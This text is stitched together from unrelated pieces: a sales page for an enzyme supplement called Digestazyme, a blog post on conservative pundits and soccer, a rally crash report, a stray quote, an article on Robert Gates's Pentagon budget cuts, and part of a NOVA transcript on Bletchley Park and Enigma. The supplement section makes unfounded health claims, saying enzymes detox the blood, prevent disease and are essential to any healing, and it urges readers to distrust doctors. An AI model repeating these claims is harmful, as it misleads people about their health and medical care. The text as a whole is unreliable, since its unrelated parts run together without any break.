Natural whole - food supplements contain within them exactly what a perfect food should contain : all the enzymes necessary for complete breakdown and absorption by the body , with nothing left over .
Three Digestazyme capsules three times a day for 60 days .
What could be simpler ?
Only in the last 15 years have powerful whole - food enzymes been available .
Dr. Howell himself , having died in 1988 , would certainly have welcomed a supplement as clean and powerful as the natural whole - food enzymes available today , which can be taken along with meals and can serve to help replace the enzymes removed in food processing .
Enzyme supplements are such a simple solution to a whole spectrum of health challenges , many of which are life - threatening , that they are generally not considered by mainstream practitioners .
MDs are taught to look for the dramatic rescue , the quick - acting drug , the heroic procedure that can snatch the patient from the jaws of death , or whatever .
That ’s more sexy ; it ’s ‘ real medicine . ’
The first problem is that most medical doctors do n’t even know of the existence of whole - food enzymes .
Yet .
The second problem is that medical doctors have a very limited exposure to enzymes in medical school .
The only concept they usually have is what is found in Guyton ’s Physiology , the standard text .
They just learn that enzymes are ‘ catalysts ’ , which means substances that cause things to happen but are themselves unchanged in the process .
Dr. Howell , who was himself an MD , proved not only was this idea inaccurate , but that there was a grand and dynamic interchange between the enzymes of digestion and the enzymes of all the other life functions , which are called enzymes of metabolism .
There are several high quality enzyme supplements on the market today .
There are also many mediocre or worthless enzymes available .
How do you tell the difference ?
THE BEST WHOLE FOOD ENZYMES
are broad spectrum contain all necessary cofactors are totally bioavailable to the cells .
The oldest and largest producer of enzyme supplements in the US is the National Enzyme Company .
This was Dr. Howell ’s company .
Today they produce enzymes for some 400 supplement companies .
Scientists found out decades ago that Aspergillus - derived enzymes were the best supplements for humans because they were broad spectrum , and could operate in the whole range of pH which exists in the human digestive tract .
Howell spent his whole life providing abundant proof of his research .
Broad spectrum means the enzymes can digest fats , proteins , and carbohydrates .
The best companies also add cellulase .
This is the fiber - digesting enzyme , which allows the vitamins and minerals within fiber to be set free and made available to the bloodstream .
The esophagus , the stomach , the sections of the small intestine , and the colon define a wide range of pH .
That means an acid / alkaline range .
Digestazyme works well in all these environments .
The best enzymes supplements contain all the necessary vitamins and minerals necessary as cofactors for enzyme activity to take place , as explained above .
The final feature –bioavailability – is only emphasized by one formula , that of the late Dr Stan Bynum .
His formula became the modern supplement Digestazyme .
It is well known as a clean product – nothing left over in the blood after it does its work .
Complete digestion .
ENZYME THERAPY
Unless the patient will eat an 80 % raw foods diet , he must take enzyme supplements in order to clear the tract , and to clear the blood .
Three capsules three times a day .
NAME OF THE GAME
With no background in nutrition , the family physician may not be the best source of information when it comes to whole food enzymes .
Why ?
Because the patient is taking the first step in the dangerous direction known as I Can Be Responsible for My Own Health .
As Dr. Mendelsohn explained , most doctors do n’t support this idea , because it tends to take away their control of things .
And if you do n’t think the name of the whole game is Control , just observe any TV channel with a stopwatch and tell me how long you can sit there without someone telling you to take some type of medication .
Five minutes ?
Ten ?
Your job is to need as many drugs as possible between now and the day you die .
Their job is to sell them to you .
Does this have anything to do with health ?
Rarely .
This has to do with pharmaceutical economics .
Health is an entirely different topic altogether ( thedoctorwithin.com ) .
Most medical doctors tell patients that diet has very little to do with their particular disease .
Ever hear of a medical doctor doing a thorough analysis of a patient ’s diet before diagnosing him as a diabetic and putting him on insulin for life ?
Of course not .
This is sales and marketing .
Occasionally doctors might say that diet may have contributed to a disease , but almost never will they say that diet can cure a disease .
Curing disease comes from only one thing : drugs .
GLOWING HEALTH OR MERE SURVIVAL ?
Where are our bright young people today ?
Where are our adults who live most of their lives as shining examples of glowing health , bursting with energy and vitality ?
A human being is not a static mass of cells , but a living process .
Each day we have a chance either to improve overall health , or else just to survive for another 24 hours .
Each day , each meal , is an opportunity to strengthen the immune system , to shore up the body ’s reserves through nutritional choices .
At any given moment in time , our health is simply the cumulative result of all these past choices .
Three opposing forces are constantly at work , trying to control our food selection :
our informed brain the advertising skills of the food industry non-nutritive food additives whose only purpose is addicting us to certain foods by stimulation of the taste buds and the nervous system
Eating when we ’re not hungry , or else just enough to get through the day , choosing the most conveniently available foods , the tasty ones with that quick jolt of sugar , or oxidized fat – this will allow us to survive .
But there ’s another option available to us – choosing foods that will detox the body , build our immunity , unclog our blood , and optimize the quality of life .
Our ability to make rational choices based on the body ’s real needs rather than on the programmed urges from the food industry – this ability will determine our total health potential .
Look around you .
Go to the mall .
Where is this Glowing Health today , even among young people ?
Where is it ?
Rather do you see bloated , slovenly , enervated unhappy people , caricatures of the human form , with bad skin , bad posture , and blocked colons ?
Processed GMO foods become our cells .
We become processed GMO beings .
Never underestimate the forces at work 24 hours a day to make us consume as much processed dairy , GMO hydrogenated soybean oil , white sugar , and white flour as possible .
We are addicted to the things that poison us .
40/20
If you ’ve hit 40 and are still eating the way you did at 20 , you ’re going down my friend .
You ’re wearing out , filling up .
The body has exhausted its efforts to break down all those chemicals , all those preservatives , all that hydrogenated oil .
Since you still take it in , it has to end up somewhere .
It does – inside you .
After age 40 you simply can’t eat the way you did at 20 .
Not if you ’re going to be healthy enough to avoid doctors and hospitals .
Comfort foods ?
So you have to have your comfort foods , right ?
Poor baby , baby , baby .
How comfortable will you be in ICU ?
Or in the Afterlife ?
After 40 , no more chips and fries .
The golden arches are history .
That ’s it for you .
Next time around maybe .
THE MASTER KEY
The best course of action would be to eat a diet consisting of more than 80 % enzyme - rich raw foods .
No argument there .
But most of us simply can’t resist all that conditioning and taste manipulation and advertising .
We rationalize to ourselves how ‘ life was meant to be lived and the hell with the rest ’ , etc .
And that line of reasoning brings most of us to processed foods .
Everything we put in our mouths is a decision , even if it ’s an unconscious one .
Each food choice poses two questions :
– will this nourish the body ?
or
– will this clog the body ?
The cumulative effect of these decisions determines whether we are toxifying or detoxifying day by day – whether we are getting sicker or better , building our immune reserves or using them up , promoting degeneration or slowing it down , moving toward life or toward death …
Aging or anti-aging .
ONE SIMPLE STEP
Whole food enzyme supplements – 3 capsules 3 times a day for 60 Days – can be the key to health , without changing one single other thing .
Detox the blood and the tract .
What ’s the alternative ?
The toxins accumulate in the blood .
Result : allergies , autoimmune stuff , arthritis , or any type of disease that starts with a chronic low - grade inflammation of something or other .
Almost sounds too simple .
But that ’s the hallmark of the classic cure – simplicity .
We ’re not adding anything new .
We ’re simply replacing something that has been artificially removed by food processing : enzymes .
We allow the body to find its normal equilibrium .
Unless we take in sufficient enzymes to completely break our food down , we eat too much .
Year by year , we balloon up – check out the mall !
Even for those of us who are not overweight , we still have a decision to make .
If we insist on sticking with the modern American processed food diet , our only salvation from ‘ digging our graves with our teeth ’ is this : whole food enzymes .
The importance of this chapter can scarcely be overemphasized .
No matter what the diet , no matter what the drug program , no matter what condition the body is in , if this issue of enzyme intake is not meticulously addressed on a daily basis , you ’re really not serious about getting better .
With any illness or chronic degeneration , a program of enzymes is the starting point , the minimum , the foundation of any healing regimen that has the slightest hope of success .
See our Nutrition videos and seminars on the YT channel :
Click here to order Enzyme supplements .
Copyright MMXIX
[ Standard disclaimer :
As required by FDA , no claim is being made here that these supplements or references will treat or cure disease . ]
REFERENCES
This one was practically invented for our amusement .
Observe ( and again , indulge the use of the word " soccer " ) :
Yet as soccer has grabbed the spotlight , it has also attracted the scorn of nativists on the right , who see the growing attention being paid to it as a byproduct of some conspiratorial leftist plot or the result of insidious foreign influences .
Fox News host Glenn Beck ranted , " I hate it so much , probably because the rest of the world likes it so much . " ... ... Matthew Philbin on the conservative site NewsBusters asserted , " The liberal media have always been uncomfortable with ' American exceptionalism ' -- the belief that the United States is unique among nations , a leader and a force for good .
And they are no happier with America 's rejection of soccer than with its rejection of socialism . "
Media Research Center 's Dan Gainor asserted that " the left is pushing it in schools across the country . "
Guest host Mark Belling on the Rush Limbaugh Show added , " They 're force - feeding this down our throats . "
Beck blustered , " It does n't matter how you try to sell it to us , it does n't matter how many celebrities you get , it does n't matter how many bars open early , it does n't matter how many beer commercials they run , we do n't want the World Cup , we do n't like the World Cup , we do n't like soccer , we want nothing to do with it .
...
They continually try to jam it down our throat . "
As this blog goes on to note , Rupert Murdoch is by definition a socialist since the Fox Soccer Channel is central to this whole conspiracy .
Here 's more from Beck :
Beck said , " Barack Obama 's policies are the World Cup .
Their policies , his policies are the World Cup of political thought ...
" The rest of the world like Barack Obama 's policies .
We do not , and I 'm cool with that .
If you want Barack Obama 's policies or the World Cup in your country have at it .
I do n't hate you .
I do n't understand you , but I do n't hate you ….
I believe that everything you need to know about Barack Obama 's policies can be explained by the World Cup… Congratulations to Barack Obama and his polices that will have as much success as the World Cup in America .
Go try those polices someplace else .
They 'll be wildly successful . "
Now some of you will say , ah , Tomasky , they 're just doing this for ratings , do n't get your knickers in a twist .
Well , sure , maybe they are to some extent .
But the interesting thing here is that it 's exactly the same style of argument they use for everything .
Insuring all your citizens is the moral equivalent of soccer , since it 's foreign , and one heard precisely the same kind of rhetoric from these hyenas during the healthcare debate .
There are two choices here , either they mean it or they do n't .
If they mean it , they 're out of their minds .
If they do n't , then they 're just a bunch of liars or hypocrites .
I doubt very much , for example , that conservative parents in America are yanking their little children out of their soccer games any more than conservative senior citizens are refusing to cash their Social Security checks .
Either way it is n't pretty .
And this is the madness we live with , folks .
A man in his 20s has been killed in a crash at the Topaz Donegal International Rally .
The deceased man has been named as Thomas Maguire , from Longwood , Co Meath .
The driver of the car remains in a critical condition at Letterkenny General Hospital tonight .
Organisers have decided to postpone tomorrow 's final day of the rally as a mark of respect for Mr Maguire .
The Donegal Motor Club has expressed its deep regret at the death .
Competitors and club officials will attend a memorial service for Mr Maguire at the Mount Errigal Hotel tomorrow morning at 11am .
This is the first time a competitor has been killed in the rally .
In 2008 , a spectator was killed and in 2002 two stewards were killed .
The Topaz Donegal International Rally is one of the biggest sporting events taking place in the country this weekend with an estimated 70,000 spectators expected in the county for the three - day event .
This is the 38th staging of the rally and it was expected to generate € 25 m .
Prof van Vugt said : " Men definitely have the most wandering eye but it is because they have evolved to pay attention to cues of fertility and one of those cues is facial beauty – it's not that men are shallow .
Robert Gates orders the Pentagon to tighten its belt in ways that could squeeze its massive bureaucracy .
Gates : Spending ' gusher ' now off
ABILENE , Kan. —
Warning that the kind of massive budget increases seen since 2001 cannot continue , Defense Secretary Robert Gates is ordering the Pentagon to tighten its belt in ways that could squeeze its massive bureaucracy and create serious heartburn on Capitol Hill and in the defense industry .
“ The attacks of Sept. 11 , 2001 , opened a gusher of defense spending that nearly doubled the base budget over the last decade , not counting supplemental appropriations for the wars in Iraq and Afghanistan , ” Gates said Saturday during a speech at the Eisenhower Library .
“ Given America ’s difficult economic circumstances and parlous fiscal condition , military spending on things large and small can and should expect closer , harsher scrutiny .
The gusher has been turned off and will stay off for a good period of time . ”
Advertisement
Since President Barack Obama took office , Gates , a Bush appointee kept on by the new administration , has preached the gospel of austerity , moving to rein in the cost of out - of - control weapons systems — but now he wants that restraint will spread more widely across the Pentagon .
It ’s a matter of necessity , he said .
The military ’s nearly $ 700 billion war chest may still grow slightly , but not enough to properly equip the military at its current size .
Given the economic circumstances , Gates told reporters that the president and Congress would probably think very hard about whether to engage in another conflict that did n't directly threaten U.S. security .
Iran is n’t one such conflict now , but said it could become one .
“ I do n't know .
I think it depends on developments over the next year or two , ” Gates said .
To maintain the size and health of the services , Gates is recommending a $ 10 billion cut in overhead costs for fiscal year 2012 that would upend how the Pentagon does business — reducing the number of general officers it promotes , consolidating agencies and increasing military health care premiums .
And he ’s continuing to tell the military it needs to change the way it thinks about weapons systems .
“ I know after this speech every flag officer will think I ’m after him or her .
That ’s just one example of where I think we have n’t exercised discipline , ” Gates said .
“ They ’re not necessarily a target ; we just have to look at everything . ”
“ The goal is to cut our overhead costs and to transfer those savings to force structure and modernization within the programmed budget .
In other words , to convert sufficient ‘ tail ' to ‘ tooth ’ to provide the equivalent of the roughly 2 to 3 percent real growth — resources needed to sustain America ’s combat power at a time of war and make investments to prepare for an uncertain future , ” Gates said in his speech .
“ Simply taking a few percent off the top of everything on a one - time basis will not do .
These savings must stem from root - and - branch changes that can be sustained and added to over time . ”
The hometown of President Dwight Eisenhower , still famous for warning about the danger of unchecked growth in the military industrial complex , provided an apt backdrop for words that pointed at all three corners of the Iron Triangle .
The speech built on a sharp warning he gave to the Navy and Marine Corps Monday at a Navy League conference , where he urged them to think more deeply about the challenges facing its costliest platforms — including aircraft carriers that run $ 11 billion each , future ballistic missile submarines costing $ 7 billion apiece and a Marine Corps amphibious assault vehicle .
Through the week , officials from the Navy and the Marine Corps and Sen. Jim Webb ( D - Va. ) , who resigned as Navy secretary under President Ronald Reagan over cuts to the Navy ’s force structure , defended the need for those programs .
“ It would be a very serious mistake to cut back or alter the defense budget in order to fund ground forces in Iraq and Afghanistan — hopefully temporarily — and , at the same time , do that at the expense of vital shipbuilding programs that take years and years to put into place and are the envy of every other country , ” Webb said in a statement .
In a conversation with reporters Friday , Gates sought to temper any claims that he was aiming to reduce the nation ’s fleet of 11 aircraft carriers .
“ I might want to change things , but I ’m not crazy .
I ’m not going to cut a carrier , OK , ” Gates said .
“ But people ought to start thinking about how they ’re going to use carriers in a time when you have highly accurate cruise and ballistic missiles that can take out a carrier that costs between 10 [ billion ] and 15 billion dollars and has 6,000 lives on it . ”
His speech laid into the Defense Department for maintaining a 20th - century , top - heavy organization so cumbersome that it takes five four - star command headquarters to sign off on a request for a dog- handling team in Afghanistan .
Gates told reporters before the speech that he did n’t have a number of officers to cut in mind but said he might consider consolidating commands but was unlikely to fight Congress over base realignments or closings .
The military ’s health care system , called TRICARE , is another area that Gates said needs cutting .
“ Leaving aside the sacred obligation we have to America ’s wounded warriors , health care costs are eating the Defense Department alive , rising from $ 19 billion a decade ago to roughly $ 50 billion — about the entire foreign affairs and assistance budget of the State Department , ” Gates said in his speech .
It ’s a perennial fight between the Pentagon and Congress , which loathes cutting such benefits — particularly for soldiers who have been fighting the nation ’s wars for nearly nine years and one the Pentagon tends to lose .
But Gates wants Congress to back his request to raise the premium and co-pay .
“ The increase we ’re talking about would be laughable to those who have nongovernmental health care , ” he told reporters , adding that a family of four under TRICARE pays $ 1,200 , compared with what the same family would pay under the federal employee health insurance program : $ 3,200 .
Gates stressed that he ’s trying to lay down the kinds of cuts that will continue to save money in the long run .
Tackling the Pentagon ’s bureaucracy is a task attempted by nearly every defense secretary — including his predecessor , Donald Rumsfeld .
Gates said that he is under no illusions about the magnitude of the job , but nonetheless hopes to win cooperation from Congress and the military where others have met resistance .
“ One of the reasons these exercises have failed in the past is there ’s no incentive for the services .
They come up with savings , and it gets hauled off and goes to someone else , ” he said .
This time , the services will be able to apply to their own programs what they save by cutting overhead costs .
“ What I ’m asking for is not a simple budget cut ; [ what ]
I ’m talking about is changing the way we do business .
It ’s taking the savings from that and applying it to long - term investments , ” he said .
“ This is a lot harder than cutting the budget for one year . ”
Asked would he stay on longer than early next year to see these budget moves through , Gates did n’t close the door , responding with the cryptic : “ We ’ll see . ”
" Decoding Nazi Secrets "
During the following program , look for NOVA 's Web markers which lead you to more information at our Web site .
NARRATOR : In spring 1946 , an order came through to destroy all the records of what had been the Allies ' most secret operation of World War II : the codebreaking unit at Bletchley Park .
UNIDENTIFIED WOMAN : Everything was destroyed , there was n't a scrap left .
NARRATOR : By mid 1940 , the German Army had conquered all of western Europe .
Hitler was tightening the noose around Britain .
In the Atlantic , German U - boats were decimating Allied convoys , threatening to cut off Britain 's only lifeline .
But Churchill had a secret weapon , the strangest military establishment in the world .
Crossword fanatics , chess champions , mathematicians , students and professors , Americans and British , all came here with one common aim : to unlock the secrets of the Enigma , a machine that concealed Germany 's war plans in seemingly unbreakable code .
If Enigma could be penetrated , everything Hitler plotted would be known in advance .
At Bletchley Park there unfolded one of the most astonishing exploits of the Second World War .
Many here had never seen a code before , yet it was their job to find a way to crack Enigma .
In the process , they devised ingenious codebreaking machines that were forerunners of the modern computer .
But everything they did remained classified for 30 years .
Tonight NOVA reveals the secrets of the men and women who helped turned the tide of victory and shape the future .
Major funding for NOVA is provided by the Park Foundation , dedicated to education and quality television .
C|Net , bringing the digital age into focus .
C|Net.com , the source for computers and technology .
This program is funded in part by Northwestern Mutual Life , which has been protecting families and businesses for generations .
Have you heard from the quiet company ?
Northwestern Mutual Life .
And by the Corporation for Public Broadcasting and by contributions to your PBS station from viewers like you .
Thank you .
NARRATOR : In 1939 , Germany introduces a devastating new kind of warfare , blitzkrieg .
Lightning attacks by tanks and planes bring Europe to its knees .
Blitzkrieg depends on surprise , demanding speedy communication .
So radio is crucial to the attack plans .
Every day the skies are full of German radio signals .
The German high command has trained thousands of wireless operators in preparation for the conquest of Europe .
Their job is to be able to interpret Morse code in any conditions .
But there is still the problem of how to keep the messages secret .
So the German military has adopted a seemingly invincible code - making machine .
The Enigma turns a message into unintelligible gibberish , letter by letter .
When the message is sent in Morse code , all an enemy would see is a meaningless string of letters .
But when the German operator at the receiving end types the coded letters back into his Enigma machine , the real message appears .
In this way vital war plans remain totally secret .
The high command never wavers from its belief in the security of Enigma .
They are so confident that they deploy the Enigma throughout the German war machine .
They never imagine what was about to happen at Bletchley Park .
NARRATOR : This is the machine the German high command believed would protect their secrets .
This is the Enigma .
TONY SALE : Its complexity 's enormous .
I mean , if I sent just one message on an Enigma machine today it would still take a super Cray computer , the fastest in the world , a year to go through searching for that one message without supporting evidence as to what that message might have been .
NARRATOR : Long before the war began , the airwaves were full of coded messages as Hitler prepared for battle .
Cracking the German ciphers became the priority of a special British Intelligence unit .
In 1938 , the unit , known as the Government Code and Cipher School , or GC&CS , moved into Bletchley Park , an ornate mansion 50 miles north of London .
From this rooftop room , wireless operators contacted listening stations all over Britain that were intercepting German messages .
Bletchley Park 's code name was Station X . The challenge of breaking the Enigma demanded a special kind of talent .
GC&CS set about recruiting .
ANDREW HODGES :
The people who a few years earlier were regarded as too young and not knowing anything of importance , of not being real people , not having , not being significant grown - up people , suddenly they were the people who held the keys to the Reich .
ARTHUR J. LEVENSON : Codebreaking was a somewhat esoteric profession .
But it was n't clear exactly who would make a good codebreaker .
People who were recruited were asked whether they did crossword puzzles .
And if they said they did and enjoyed doing them , and did them well , that was generally enough to get you in .
We discovered people of a whole variety of backgrounds did very well .
Anthropologists , Egyptologists , paleontologists , and even an occasional lawyer turned out to have the knack .
NARRATOR : Bletchley Park evolved into a unique operation in which military discipline , uniforms , and rank no longer mattered .
The sole imperative was to break the Enigma , and break it as quickly as possible .
DONALD MICHIE :
At that age you can just take fire and blaze away , half out of your mind with enthusiasm and dedication , you 're not married , you do n't have to worry about the kids and the rent and so forth .
And during that sort of short period of your life you can live like a madman and , you know , take almost no sleep and - determined to do it .
NARRATOR : But youth and determination were n't enough .
Mathematicians were enlisted to take on the daunting complexity of the Enigma .
Only a completely new approach to codebreaking could help to penetrate its secrets .
But if the work at Bletchley Park were to succeed , absolute secrecy was essential .
Some of the recruits had no idea of the purpose of their work .
GWEN WATKINS : Most of us who were among the - what shall I say , the hoi polloi , the lower grades , never knew what went on at Bletchley Park .
The only time I realized what we were actually doing was when I was shown a code book which had just been captured and rushed to Bletchley from a captured plane , and of course we had no plastic envelopes or anything then , the poor thing was just given to me as it was and I was horrified to see a huge bloodstain on it , the blood ' round the edges was drying , but the blood in the middle was still wet and I realized then that somewhere was this German - this German air crew bleeding , still bleeding while I was decoding - I was writing out in modern German their new code book , and that did bring the war very close .
NARRATOR : The Germans were supremely confident in the Enigma .
Its basic principle was simple , but it could scramble messages in millions of different ways .
Pressing one typewriter key would light up a totally different letter .
An electrical current was sent from the keys to the letters through a series of rotors .
Each time a key was pressed a rotor would turn , altering the wiring and so changing the letter that was produced .
TONY SALE :
The total number of ways in which the Enigma machine can be configured for any particular message is 150 million million million .
So it was an enormous complexity which was why the Germans thought it was completely safe .
NARRATOR : The Enigma was first developed as a commercial encryption device in the 1920s and patented in London .
German banks and railways were among its first customers , but the German military was quick to see its potential .
Each day German operators in the field received a new set of instructions from base on how to set up the Enigma .
They had to make three adjustments so that both the sender 's and receiver 's machines would match .
First , which rotors to put into the machine and in what order .
TONY SALE :
The rotors contained one of the central secrets of the Enigma machine , which was the cross wiring inside the wheels .
The whole of this maze of wiring inside changed every time a letter was entered and that 's what gave the Enigma machine its vast complexity .
NARRATOR : The second step was to change the wiring of each rotor by adjusting the ring of letters around the rim - 26 combinations on each wheel .
The third step was the plugboard .
Using his secret instructions for the day , the operator could wire up each typewriter key to a totally different letter .
TONY SALE :
This was what the Germans thought was the killer cryptographically .
This plugboard enabled you to transpose letters completely , a pair of letters .
Now because there are 26 sockets on the front of the Enigma machine , you can plug these pairs of letters together in an absolutely astronomical number of combinations , about one - and - a - half million million combinations that you can use on the front .
NARRATOR : Once the machine was set up , the message was encoded letter by letter .
These letters were then sent by Morse code to the receiver at the other end .
The Germans were never shaken in their belief in Enigma 's invincibility .
At first , all the codebreakers had were meaningless groups of coded letters and endless patience .
And in the first months of the war the new recruits were getting nowhere .
TONY SALE :
At the beginning of the war there was a great difficulty because although we had intercepts which we knew were enciphered using the Enigma machine , we did n't know enough detail about the machine to be able to even begin to find any method of breaking it .
Unless you 've got the exact key you just cannot get anywhere with it at all and this is a major difference from any code systems prior to that , that the Enigma machine , there 's no sense of nearness , you 're not nearly at a solution .
You 've either got the solution or you have n't got the solution .
NARRATOR : The search for a solution began long before the war .
Starting in 1931 and continuing for seven years , a hard - up German army clerk secretly obtained more than 300 documents , including the instructions and settings for the Enigma machines .
He sold them to the French Secret Service , but their cryptographers showed little interest .
Next the stolen documents were offered to the British Secret Service .
At this stage , GC&CS was skeptical that Enigma could be broken and politely declined the offer .
Finally the documents went to the Poles .
With Germany breathing down their necks , their response was very different .
A deal was struck .
With the stolen documents in hand , three brilliant young Polish mathematicians , Zygalski , Rozycki and Rejewski , set to work on the Enigma .
The Poles soon realized that they had to figure out how the Germans had wired the Enigma 's keyboard to the first rotor .
Since any typewriter key could be wired to any letter on the rotor , the number of possible wiring orders was astronomical .
But if the Poles could work this out , it would be a vital first step in breaking the Enigma .
TONY SALE : Rejewski had a flash of inspiration and he thought , what about if they 've been stupid enough to just use ABCD as the order round the rotor , and they had , all the multitude of millions and millions of ways in which they could have scrambled the connection from the keyboard to the entry point , and they 'd just chosen ABCD .
And Marian Rejewski in desperation tried that , it worked , and suddenly he'd got the internal connections of the whole of the German forces machine .
NARRATOR : But in 1939 , on the eve of the invasion of Poland , the Germans added an extra choice of rotors to the Enigma and the Poles could no longer read any of the messages .
In desperation , they invited British and French officials to a secret meeting in a forest near Warsaw .
They revealed how they had previously broken the Enigma .
The British were astonished .
TONY SALE : And Dilly Knox , he was one of the members of the team that went there , and the first thing he asked Rejewski was , what is this mapping from the keyboard to the entry rotor , and Rejewski said , ABCD .
And Dilly Knox went , oh God , we never thought of that , it 's too obvious , why did n't we think of that ?
NARRATOR : Within weeks of that meeting , Poland was invaded and war broke out .
The Polish cryptographers had given Bletchley Park their own replica of the Enigma machine , but the extra rotors the Germans had added meant that the codebreakers were still in the dark .
As the flow of German messages increased , at last they began to see a way of achieving the impossible .
The starting point was the messages themselves .
The British had set up a worldwide network of radio listening posts operated by the military , the post office , and even the London police .
They were known as Y Stations .
JOAN NICHOLLS : Wherever the Germans were , we were listening .
When there was a lot of excitement , the wires would be absolutely humming with Morse , they'd be transmitting all over the place .
We 'd really have cramp in our fingers sometimes , trying to write it down non-stop .
NARRATOR : Round the clock and around the world , thousands of operators were writing down meaningless groups of coded letters , the raw material for Bletchley Park .
Their approach to cracking the Enigma began with another Polish breakthrough .
One of the special procedures the Germans followed in setting up their machines was known as a double indicator .
It was to be the Enigma 's Achilles ' heel .
The instruction sheets for each day told the German operator how to set up his Enigma .
They specified the order of the rotors and the position of the ring of letters around each rotor .
The sheets then provided instructions for wiring up the plugboard .
All Enigmas on a network had to be set up identically for the system to work .
But there was one extra level of security .
If the enemy captured the instruction sheets , they would be able read all the messages .
To prevent this , each message had its own secret rotor setting , chosen by the operator .
First the operator had to pick three random letters .
He sent these in plain text to the operator at the receiving end , allowing that other person to line up his machine identically .
TONY SALE :
But now the operator had to be able to tell the operator at the receiving end what the actual message settings from which he was going to start enciphering the message , and that had to be conveyed to the operator the other end but not revealed to any interceptor , and the way that they chose to do this was to use the Enigma machine itself to conceal this message setting .
NARRATOR : So the operator encoded a second group of three letters as the secret message setting itself .
TONY SALE :
And supposing he thought of SWJ , and when he keys in SWJ the lamps light up ITV .
Because the Germans felt that radio transmissions might be unreliable they went a step further and they actually asked the operator at the sending end to key in the message setting twice .
So the procedure was to key in SWJ SWJ and to note down all six lamps that lit and that was a crucial mistake because the repetition of the message setting gives a cryptographer a toe - hold into finding out what it actually is , repetitions are always bad news in cryptography .
NARRATOR : By encoding the same letters twice , the Germans gave the codebreakers their first clue about the setting of the Enigma rotors .
Soon there was a second clue .
The Poles had noticed a strange quirk in the way the rotors worked .
In about one out of eight intercepts , the Enigma was turning one of the letters in the message setting into the same coded letter twice .
The mistake of sending the message setting twice was revealing a flaw in the machine itself .
Although it was designed to produce random coded letters , there were certain situations in which the Enigma was much less random than the Germans believed .
DONALD MICHIE :
There is no such thing as a random , a truly random sequence that can be generated by a purely deterministic machine .
That just can not be .
It 's part of the definition of randomness that it cannot be explained or predicted in any way whatsoever .
The whole game of cipher design is to design machines which are flawed , they have to be , but in which the flaws are as small , inconspicuous as possible .
NARRATOR : It was just such a flaw that broke the Enigma .
Bletchley Park called the repeated letters " females . "
Only a few configurations of the machine could produce these females .
If the codebreakers now worked their way through them , they would find that day 's settings .
The codebreakers produced huge cards , known as Jeffries sheets , with holes punched through in an alphabetical grid representing the wheel positions that could produce females .
By lining these sheets over each other , the codebreakers could hunt through the wheel positions to find out how the Enigma had been set up for that day .
PAM BREWSTER : They were , John Jeffries , they were really his rather special baby .
And they were on sort of cartridge weight paper .
Not very thick card , they got very dog-eared .
And as far as I remember there were two alphabets that way and that way .
It was like solving a very difficult crossword puzzle .
You could actually see it happening .
And the triumph when you found it worked , that was fascinating .
LEVER : Marvelous .
Absolutely marvelous .
There 's nothing like seeing a code broken .
That is really absolutely the tops .
LESLIE YOXALL :
The one thing that was very interesting was that people were very reluctant to go home at the end of the shift .
There was a certain amount of " Move over ! "
You know " Let me sit down and get on with it . "
People wanted to hang in there .
ALAN ROGERS : On one occasion I was on the evening shift but when midnight came I was stuck in a message that was , had gripped me so hard I worked right through ' til breakfast time .
From four o'clock in the afternoon to breakfast the next day .
Simply because this had to get done .
NARRATOR : In the spring of 1941 , the naval war was building up in the Mediterranean .
Hitler had joined forces with the Italian Fascist Mussolini .
Both dictators were dreaming of global empires .
The Allies knew that the Germans had given Enigma machines to the Italians .
One of the codebreakers trying to break in to the Italian messages was 19 - year - old Mavis Lever .
MAVIS LEVER : Sometimes you 'd have to spend the whole night assuming every position that there could be on the three different wheels , and there we called them Red , Blue and Green , the wheels , I think they did too .
So that you would have to work at it very , very hard and it was that I think that made one pink - eyed and after you 'd done it for a few hours you wondered whether you 'd ever see anything when it was before your eyes because you were so snarled up in it all .
NARRATOR : Mavis and the other codebreakers did n't know it , but they were about to make their first major impact on the war .
MAVIS LEVER :
The one that came up was real good stuff , drama , " Today 's the day minus three , " just that and nothing else .
And so of course we knew that something was going to happen , the Italians were going to do something , the Italian Navy , in three days ' time .
Why they had to say that I can't imagine , it seems rather daft but still they did .
NARRATOR : The British fleet was based in the Egyptian port of Alexandria under the command of Admiral Andrew Cunningham .
Bletchley Park intercepted a message that would lead the Admiral to hatch a clever plan .
MAVIS LEVER :
Well then a very , very large message came in which was the battle orders , how many cruisers there were and how many submarines were to be there and where they were to be at such and such a time , absolutely incredible that they should really spell it all out .
NARRATOR : Mavis had decoded just the message that Cunningham needed to outwit the Italians .
MAVIS LEVER :
It was 11 o'clock at night and it was pouring with rain when I rushed , ran , absolutely tore down to take it to the Italian - to intelligence to get it across to Cunningham .
NARRATOR : Within hours the decoded message was on its way to Cunningham in Egypt .
The Italian fleet was gathering off Cape Matapan on the Greek coast .
Their plan was to attack a British convoy at midnight .
Alexandria was a nest of spies .
The problem for Cunningham was how to act on the message without giving his plans away .
If he led the fleet out to sea the Italians would know immediately .
Cunningham embarked on an elaborate ruse to fool the spies .
He wanted his enemies to believe that all was quiet .
MAVIS LEVER : He did a real Drake on them , well more than Drake , because he played golf and pretended he was , you know , just going to have a , you know , a weekend off .
SIR ROBERT ATKINSON : Admiral Cunningham was a crafty fellow , and by subterfuge he was able to lead the enemy to think he was socially engaged doing something else , and I 've no doubt when he went ashore at Alexandria to play golf , that information was in Italy within about five minutes .
NARRATOR : But at night Cunningham slipped back on board and led the British fleet out to sea , to the precise spot where the Italian ships were gathered .
The ruse worked .
Cunningham caught the Italians completely off guard .
That night the Italians lost nearly 3000 men , the cream of their navy .
It was the first major coup for Bletchley Park .
NEWSREEL : The Navy does it again .
Here is the British Mediterranean fleet preparing for what proved to be the greatest naval engagement so far fought in this war .
The Battle of Matapan is one more proof that Britain is the unchallenged ruler of the Mediterranean waves .
NARRATOR : The Navy were the heroes of the Battle of Matapan .
Bletchley Park was of course never mentioned , but the codebreakers had their own reward .
MAVIS LEVER : Then Cunningham himself came , it was the first thing he wanted to do when he came was to see the actual message that had been broken , and he was very nice and we had a drink , and we were in this little cottage and the walls had just been whitewashed , now this will show you how sort of silly and young and giggly we were , but we thought it would be jolly nice if we could get , talk to Admiral Cunningham and get him to lean against the wet whitewash and go away with a white stern .
So that 's what we did so , you know , it 's rather terrible , is n't it , that on the one hand everything 's so - seems to be so very organized , and these silly young things are wanting to snare the Admiral .
NARRATOR : But their joy was to be short - lived .
TONY SALE : And then disaster struck .
The Germans issued a decree , no more double enciphering of the message setting , just single enciphering .
Catastrophe , suddenly the Jeffries sheets did n't work and so suddenly darkness fell .
NARRATOR : Gloom descended not only on Bletchley Park but on all British cities .
For months , relentless bombing had become part of everyday life .
The Blitz was a war of blood and nerves .
SARAH BARING :
Well , there was one very good remark is , the only good German is a dead one .
We felt very , very strongly .
